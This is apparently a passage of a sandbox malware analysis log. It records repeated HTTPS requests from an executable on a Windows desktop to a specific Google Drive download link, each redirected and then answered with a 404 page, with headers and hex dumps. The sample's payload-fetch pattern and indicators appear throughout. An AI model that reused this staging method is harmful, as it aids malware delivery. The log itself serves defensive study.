                                                        2024-12-05 16:07:07 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:07:07 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:07:07 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-gL7LpPyXXEXLwQLtBvh1gA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        45192.168.11.2049796142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:07:08 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:07:08 UTC1854INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:07:08 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-Cf9GuY1UAhc79GxP6I_Czw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC6h-yGpyTBYgXE3_1WIVD4kuckgTHVGSxZ3ZxtAX7T6LGcOY_w8040ucy3hZ-JMiSjwyO7LweRRww
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:07:08 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 51 69 4e 58 64 58 4e 41 51 70 43 4a 6e 53 73 31 61 79 66 48 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2QiNXdXNAQpCJnSs1ayfHg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        46192.168.11.2049797142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:07:18 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:07:19 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:07:18 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-VoRuib4s7-AH2UB-XRfauw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        47192.168.11.2049798142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:07:19 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:07:19 UTC1854INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:07:19 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-p4MEjeDn8eq7lz9hQjUC_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC4cutw_e6yuMkUxDL3Dm-QqjtqW3fJV2we6NAJx5JApZmdZUHFwgSXjmPodoOUeluqshdWG6CvSzA
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:07:19 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 2d 2d 45 38 50 44 78 51 56 4f 6f 31 68 5f 53 6f 59 6a 74 44 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="a--E8PDxQVOo1h_SoYjtDg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        48192.168.11.2049799142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:07:29 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:07:30 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:07:30 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-1qwE3jGjk0kqjtfF7CUOOg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        49192.168.11.2049800142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:07:30 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:07:30 UTC1847INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:07:30 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-j8DlFE1tE1lSIpUz904DLA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC6Hli5MpzbTyXPRUc50JhgdOIvYUTYXTvjQPOSyqVyxNTMSJPpa6KQ0sF1R9oOu8gRVAN4
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:07:30 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 5f 54 69 52 50 37 58 77 69 38 37 2d 73 44 54 45 36 5f 2d 65 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="l_TiRP7Xwi87-sDTE6_-ew">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        50192.168.11.2049801142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:07:41 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:07:41 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:07:41 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-p3l5JGQxn3ohiMiTHjQQqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        51192.168.11.2049802142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:07:41 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:07:41 UTC1847INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:07:41 GMT
                                                        Content-Security-Policy: script-src 'nonce-NQ1mB4Pom_oMhq1r8loscg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC5tu7iLH0MIabquVAm1oiHiYiUAw8jjJJWA8iLP5LesiPMDsfzydBghOKaqIxrCDRDkGv0
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
